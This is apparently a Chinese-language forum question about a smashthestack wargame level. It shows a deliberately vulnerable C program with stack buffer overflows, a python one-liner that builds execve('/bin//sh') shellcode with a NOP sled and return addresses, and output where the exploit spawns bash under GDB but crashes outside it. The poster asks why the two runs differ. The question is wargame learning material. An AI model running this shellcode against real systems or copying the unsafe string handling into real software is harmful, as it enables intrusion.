我从smashthestack得到这段代码:
//bla, based on work by nnp
#include <stdio.h>
#include <string.h>
void prompt_name(char *name, char *msg){
char buf[4096];
int i = 0;
puts(msg);
i = read(0, buf, sizeof buf);
printf("Read %d bytes\n", i);
*strchr(buf, '\n') = 0;
strncpy(name, buf, 20);
}
void prompt_full_name(char *fullname) {
char last[20];
char first[20];
prompt_name(first, "Please enter your first name: ");
prompt_name(last, "Please enter your last name: ");
strcpy(fullname, first);
strcat(fullname, " ");
strcat(fullname, last);
}
int main(int argc, char **argv){
char fullname[42];
prompt_full_name(fullname);
printf("Welcome, %s\n", fullname);
return 0;
}
我使用这个shellcode执行这个程序:
python -c 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80" + "\x90" * 2009 + "\x90" * 2065 + "\n" + "\x80\xec\x02\xf4\xff\xbf\x03\xf4\xff\xbf\x04\xd4\xff\xbf\xa6\xfc\xff\xbf\xff" + "\n"' > /tmp/in
在 GDBrun < /tmp/in中,一切正常: (gdb) run < /tmp/wliao_in
Starting program: /levels/level06 < /tmp/wliao_in
Please enter your first name:
Please enter your last name:
Welcome, j
X�Rh//shh/bin��1�̀��������������� ����������������
Executing new program: /bin/bash
但实际上,它不是:
level6@io:/levels$ cat /tmp/in | ./level06
Please enter your first name:
Please enter your last name:
Welcome, j
X�Rh//shh/bin��1�̀��������������� ����������������
Illegal instruction
我不明白这两者有什么不同?